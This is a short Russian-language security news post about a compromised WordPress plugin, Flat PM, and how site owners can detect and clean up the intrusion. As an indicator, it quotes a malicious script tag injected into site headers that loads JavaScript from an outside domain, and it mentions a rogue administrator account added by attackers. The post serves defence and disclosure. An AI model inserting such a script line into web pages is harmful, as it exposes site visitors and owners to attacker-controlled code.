Безопасность

Закрыта опасная уязвимость в плагине Flat PM

Рейтинг: 4.9 из 46 оценок

Вчера был скомпрометирован популярный плагин FlatPM для управления рекламой на сайтах под управлением WordPress.

Из-за уязвимости в плагине, которую Михаил Flat (автор плагина) поправил в версии 2.654, было взломано несколько сайтов.

Для проверки взлома нужно перейти в настройки вставки между тегами <head> и </head> и проверить нет ли там скрипта, который вы не добавляли.

Например:

<script type='text/javascript' src='https://wpctrl.tk/ds.js'></script>

Если это ваш случай, то настоятельно рекомендуем восстановить полный бекап сайта за вчерашний день или ранее и сразу обновить плагин до последней версии.

Также, если по какой-то причине вы этого не хотите делать или не можете, то удалите вредоносный код из раздела Header и footer, затем удалите нового пользователя из админки.

Читать далее

Добавить комментарий